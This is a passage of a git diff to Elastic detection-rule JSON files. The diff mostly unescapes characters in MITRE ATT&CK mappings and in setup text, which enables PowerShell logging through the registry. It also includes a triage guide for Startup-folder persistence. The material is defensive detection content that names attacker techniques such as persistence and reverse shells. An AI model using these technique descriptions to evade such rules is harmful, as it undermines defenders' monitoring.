{ - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -98,7 +98,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/2e29e96a-b67c-455a-afe4-de6183431d0d_109.json b/packages/security_detection_engine/kibana/security_rule/2e29e96a-b67c-455a-afe4-de6183431d0d_109.json index 8c8a4e2762d..980f69e3d1b 100644 --- a/packages/security_detection_engine/kibana/security_rule/2e29e96a-b67c-455a-afe4-de6183431d0d_109.json +++ b/packages/security_detection_engine/kibana/security_rule/2e29e96a-b67c-455a-afe4-de6183431d0d_109.json @@ -58,7 +58,7 @@ ], "risk_score": 47, "rule_id": "2e29e96a-b67c-455a-afe4-de6183431d0d", - "setup": "\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", + "setup": "\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -98,7 +98,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/2e311539-cd88-4a85-a301-04f38795007c_1.json b/packages/security_detection_engine/kibana/security_rule/2e311539-cd88-4a85-a301-04f38795007c_1.json index 6003d37fed7..b7f67f8e538 100644 --- a/packages/security_detection_engine/kibana/security_rule/2e311539-cd88-4a85-a301-04f38795007c_1.json +++ b/packages/security_detection_engine/kibana/security_rule/2e311539-cd88-4a85-a301-04f38795007c_1.json @@ -55,7 +55,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0009", "name": "Collection", diff --git a/packages/security_detection_engine/kibana/security_rule/2e56e1bc-867a-11ee-b13e-f661ea17fbcd_1.json b/packages/security_detection_engine/kibana/security_rule/2e56e1bc-867a-11ee-b13e-f661ea17fbcd_1.json index 8789544fbba..45ec2213378 100644 --- a/packages/security_detection_engine/kibana/security_rule/2e56e1bc-867a-11ee-b13e-f661ea17fbcd_1.json +++ b/packages/security_detection_engine/kibana/security_rule/2e56e1bc-867a-11ee-b13e-f661ea17fbcd_1.json @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/2e580225-2a58-48ef-938b-572933be06fe_101.json b/packages/security_detection_engine/kibana/security_rule/2e580225-2a58-48ef-938b-572933be06fe_101.json index 3186cd23e91..4a0dcef38bf 100644 --- a/packages/security_detection_engine/kibana/security_rule/2e580225-2a58-48ef-938b-572933be06fe_101.json +++ b/packages/security_detection_engine/kibana/security_rule/2e580225-2a58-48ef-938b-572933be06fe_101.json @@ -36,7 +36,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/2e580225-2a58-48ef-938b-572933be06fe_102.json b/packages/security_detection_engine/kibana/security_rule/2e580225-2a58-48ef-938b-572933be06fe_102.json index c04e3f89f36..30d5fb7190a 100644 --- a/packages/security_detection_engine/kibana/security_rule/2e580225-2a58-48ef-938b-572933be06fe_102.json +++ b/packages/security_detection_engine/kibana/security_rule/2e580225-2a58-48ef-938b-572933be06fe_102.json @@ -32,7 +32,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/2e580225-2a58-48ef-938b-572933be06fe_103.json b/packages/security_detection_engine/kibana/security_rule/2e580225-2a58-48ef-938b-572933be06fe_103.json index b458c0edd42..e988e2ff29c 100644 --- a/packages/security_detection_engine/kibana/security_rule/2e580225-2a58-48ef-938b-572933be06fe_103.json +++ b/packages/security_detection_engine/kibana/security_rule/2e580225-2a58-48ef-938b-572933be06fe_103.json @@ -34,7 +34,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/2e580225-2a58-48ef-938b-572933be06fe_104.json b/packages/security_detection_engine/kibana/security_rule/2e580225-2a58-48ef-938b-572933be06fe_104.json index 21aa20db9de..b4552dbc40a 100644 --- a/packages/security_detection_engine/kibana/security_rule/2e580225-2a58-48ef-938b-572933be06fe_104.json +++ b/packages/security_detection_engine/kibana/security_rule/2e580225-2a58-48ef-938b-572933be06fe_104.json @@ -34,7 +34,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/2edc8076-291e-41e9-81e4-e3fcbc97ae5e_104.json b/packages/security_detection_engine/kibana/security_rule/2edc8076-291e-41e9-81e4-e3fcbc97ae5e_104.json index 67474d69a04..7890da4de63 100644 --- a/packages/security_detection_engine/kibana/security_rule/2edc8076-291e-41e9-81e4-e3fcbc97ae5e_104.json +++ b/packages/security_detection_engine/kibana/security_rule/2edc8076-291e-41e9-81e4-e3fcbc97ae5e_104.json @@ -44,7 +44,7 @@ ], "risk_score": 73, "rule_id": "2edc8076-291e-41e9-81e4-e3fcbc97ae5e", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -57,7 +57,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/2edc8076-291e-41e9-81e4-e3fcbc97ae5e_105.json b/packages/security_detection_engine/kibana/security_rule/2edc8076-291e-41e9-81e4-e3fcbc97ae5e_105.json index 31b4db5c850..9f82f79bbbf 100644 --- a/packages/security_detection_engine/kibana/security_rule/2edc8076-291e-41e9-81e4-e3fcbc97ae5e_105.json +++ b/packages/security_detection_engine/kibana/security_rule/2edc8076-291e-41e9-81e4-e3fcbc97ae5e_105.json @@ -44,7 +44,7 @@ ], "risk_score": 73, "rule_id": "2edc8076-291e-41e9-81e4-e3fcbc97ae5e", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/2edc8076-291e-41e9-81e4-e3fcbc97ae5e_106.json b/packages/security_detection_engine/kibana/security_rule/2edc8076-291e-41e9-81e4-e3fcbc97ae5e_106.json index 864f748a6fd..fd4b69e5053 100644 --- a/packages/security_detection_engine/kibana/security_rule/2edc8076-291e-41e9-81e4-e3fcbc97ae5e_106.json +++ b/packages/security_detection_engine/kibana/security_rule/2edc8076-291e-41e9-81e4-e3fcbc97ae5e_106.json @@ -44,7 +44,7 @@ ], "risk_score": 73, "rule_id": "2edc8076-291e-41e9-81e4-e3fcbc97ae5e", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -57,7 +57,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/2edc8076-291e-41e9-81e4-e3fcbc97ae5e_107.json b/packages/security_detection_engine/kibana/security_rule/2edc8076-291e-41e9-81e4-e3fcbc97ae5e_107.json index 5135df06696..dbc71e6a492 100644 --- a/packages/security_detection_engine/kibana/security_rule/2edc8076-291e-41e9-81e4-e3fcbc97ae5e_107.json +++ b/packages/security_detection_engine/kibana/security_rule/2edc8076-291e-41e9-81e4-e3fcbc97ae5e_107.json @@ -44,7 +44,7 @@ ], "risk_score": 73, "rule_id": "2edc8076-291e-41e9-81e4-e3fcbc97ae5e", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "high", "tags": [ "Domain: Endpoint", @@ -57,7 +57,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/2edc8076-291e-41e9-81e4-e3fcbc97ae5e_108.json b/packages/security_detection_engine/kibana/security_rule/2edc8076-291e-41e9-81e4-e3fcbc97ae5e_108.json index ffed1b8e2c1..91a41249afe 100644 --- a/packages/security_detection_engine/kibana/security_rule/2edc8076-291e-41e9-81e4-e3fcbc97ae5e_108.json +++ b/packages/security_detection_engine/kibana/security_rule/2edc8076-291e-41e9-81e4-e3fcbc97ae5e_108.json @@ -44,7 +44,7 @@ ], "risk_score": 73, "rule_id": "2edc8076-291e-41e9-81e4-e3fcbc97ae5e", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "high", "tags": [ "Domain: Endpoint", @@ -57,7 +57,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/2f2f4939-0b34-40c2-a0a3-844eb7889f43_105.json b/packages/security_detection_engine/kibana/security_rule/2f2f4939-0b34-40c2-a0a3-844eb7889f43_105.json index b2cb39868d4..fd8ce23eb9e 100644 --- a/packages/security_detection_engine/kibana/security_rule/2f2f4939-0b34-40c2-a0a3-844eb7889f43_105.json +++ b/packages/security_detection_engine/kibana/security_rule/2f2f4939-0b34-40c2-a0a3-844eb7889f43_105.json @@ -47,7 +47,7 @@ ], "risk_score": 47, "rule_id": "2f2f4939-0b34-40c2-a0a3-844eb7889f43", - "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", + "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "medium", "tags": [ "Elastic", @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0009", "name": "Collection", @@ -75,7 +75,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/2f2f4939-0b34-40c2-a0a3-844eb7889f43_106.json b/packages/security_detection_engine/kibana/security_rule/2f2f4939-0b34-40c2-a0a3-844eb7889f43_106.json index 5a29c407f4c..3c32882010f 100644 --- a/packages/security_detection_engine/kibana/security_rule/2f2f4939-0b34-40c2-a0a3-844eb7889f43_106.json +++ b/packages/security_detection_engine/kibana/security_rule/2f2f4939-0b34-40c2-a0a3-844eb7889f43_106.json @@ -47,7 +47,7 @@ ], "risk_score": 47, "rule_id": "2f2f4939-0b34-40c2-a0a3-844eb7889f43", - "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", + "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0009", "name": "Collection", @@ -74,7 +74,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/2f2f4939-0b34-40c2-a0a3-844eb7889f43_107.json b/packages/security_detection_engine/kibana/security_rule/2f2f4939-0b34-40c2-a0a3-844eb7889f43_107.json index 7378d083e5a..87a76e70677 100644 --- a/packages/security_detection_engine/kibana/security_rule/2f2f4939-0b34-40c2-a0a3-844eb7889f43_107.json +++ b/packages/security_detection_engine/kibana/security_rule/2f2f4939-0b34-40c2-a0a3-844eb7889f43_107.json @@ -47,7 +47,7 @@ ], "risk_score": 47, "rule_id": "2f2f4939-0b34-40c2-a0a3-844eb7889f43", - "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", + "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0009", "name": "Collection", @@ -74,7 +74,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/2f2f4939-0b34-40c2-a0a3-844eb7889f43_108.json b/packages/security_detection_engine/kibana/security_rule/2f2f4939-0b34-40c2-a0a3-844eb7889f43_108.json index ebcbe46c4c7..623d0c7e31d 100644 --- a/packages/security_detection_engine/kibana/security_rule/2f2f4939-0b34-40c2-a0a3-844eb7889f43_108.json +++ b/packages/security_detection_engine/kibana/security_rule/2f2f4939-0b34-40c2-a0a3-844eb7889f43_108.json @@ -47,7 +47,7 @@ ], "risk_score": 47, "rule_id": "2f2f4939-0b34-40c2-a0a3-844eb7889f43", - "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", + "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0009", "name": "Collection", @@ -74,7 +74,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/2f2f4939-0b34-40c2-a0a3-844eb7889f43_109.json b/packages/security_detection_engine/kibana/security_rule/2f2f4939-0b34-40c2-a0a3-844eb7889f43_109.json index f3ae89be764..21e902ff8ac 100644 --- a/packages/security_detection_engine/kibana/security_rule/2f2f4939-0b34-40c2-a0a3-844eb7889f43_109.json +++ b/packages/security_detection_engine/kibana/security_rule/2f2f4939-0b34-40c2-a0a3-844eb7889f43_109.json @@ -47,7 +47,7 @@ ], "risk_score": 47, "rule_id": "2f2f4939-0b34-40c2-a0a3-844eb7889f43", - "setup": "\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", + "setup": "\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0009", "name": "Collection", @@ -74,7 +74,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/2f8a1226-5720-437d-9c20-e0029deb6194_103.json b/packages/security_detection_engine/kibana/security_rule/2f8a1226-5720-437d-9c20-e0029deb6194_103.json index 2d4a329ca85..bfa2b0c566d 100644 --- a/packages/security_detection_engine/kibana/security_rule/2f8a1226-5720-437d-9c20-e0029deb6194_103.json +++ b/packages/security_detection_engine/kibana/security_rule/2f8a1226-5720-437d-9c20-e0029deb6194_103.json @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/2f8a1226-5720-437d-9c20-e0029deb6194_104.json b/packages/security_detection_engine/kibana/security_rule/2f8a1226-5720-437d-9c20-e0029deb6194_104.json index 6d875c7a2fe..168c9ecc03a 100644 --- a/packages/security_detection_engine/kibana/security_rule/2f8a1226-5720-437d-9c20-e0029deb6194_104.json +++ b/packages/security_detection_engine/kibana/security_rule/2f8a1226-5720-437d-9c20-e0029deb6194_104.json @@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/2f8a1226-5720-437d-9c20-e0029deb6194_105.json b/packages/security_detection_engine/kibana/security_rule/2f8a1226-5720-437d-9c20-e0029deb6194_105.json index 1f12374c343..a0ca41aa220 100644 --- a/packages/security_detection_engine/kibana/security_rule/2f8a1226-5720-437d-9c20-e0029deb6194_105.json +++ b/packages/security_detection_engine/kibana/security_rule/2f8a1226-5720-437d-9c20-e0029deb6194_105.json @@ -54,7 +54,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/2f8a1226-5720-437d-9c20-e0029deb6194_106.json b/packages/security_detection_engine/kibana/security_rule/2f8a1226-5720-437d-9c20-e0029deb6194_106.json index 296a8266fd5..703c28bb098 100644 --- a/packages/security_detection_engine/kibana/security_rule/2f8a1226-5720-437d-9c20-e0029deb6194_106.json +++ b/packages/security_detection_engine/kibana/security_rule/2f8a1226-5720-437d-9c20-e0029deb6194_106.json @@ -55,7 +55,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/2f8a1226-5720-437d-9c20-e0029deb6194_107.json b/packages/security_detection_engine/kibana/security_rule/2f8a1226-5720-437d-9c20-e0029deb6194_107.json index d7b2e1f7f2e..d4af282aa7c 100644 --- a/packages/security_detection_engine/kibana/security_rule/2f8a1226-5720-437d-9c20-e0029deb6194_107.json +++ b/packages/security_detection_engine/kibana/security_rule/2f8a1226-5720-437d-9c20-e0029deb6194_107.json @@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/2f8a1226-5720-437d-9c20-e0029deb6194_108.json b/packages/security_detection_engine/kibana/security_rule/2f8a1226-5720-437d-9c20-e0029deb6194_108.json index fdcb4b4c2e8..7d2038da48e 100644 --- a/packages/security_detection_engine/kibana/security_rule/2f8a1226-5720-437d-9c20-e0029deb6194_108.json +++ b/packages/security_detection_engine/kibana/security_rule/2f8a1226-5720-437d-9c20-e0029deb6194_108.json @@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/2fba96c0-ade5-4bce-b92f-a5df2509da3f_104.json b/packages/security_detection_engine/kibana/security_rule/2fba96c0-ade5-4bce-b92f-a5df2509da3f_104.json index 52b3cba122b..8a1bbfe054b 100644 --- a/packages/security_detection_engine/kibana/security_rule/2fba96c0-ade5-4bce-b92f-a5df2509da3f_104.json +++ b/packages/security_detection_engine/kibana/security_rule/2fba96c0-ade5-4bce-b92f-a5df2509da3f_104.json @@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Startup Folder Persistence via Unsigned Process", - "note": "## Triage and analysis\n\n### Investigating Startup Folder Persistence via Unsigned Process\n\nThe Windows Startup folder is a special folder in Windows. Programs added to this folder are executed during account logon, without user interaction, providing an excellent way for attackers to maintain persistence.\n\nThis rule looks for unsigned processes writing to the Startup folder locations.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- There is a high possibility of benign legitimate programs being added to Startup folders. This activity could be based on new software installations, patches, or any kind of network administrator related activity. Before undertaking further investigation, verify that this activity is not benign.\n\n### Related rules\n\n- Suspicious Startup Shell Folder Modification - c8b150f0-0164-475b-a75e-74b47800a9ff\n- Persistent Scripts in the Startup Directory - f7c4dc5a-a58d-491d-9f14-9b66507121c0\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, 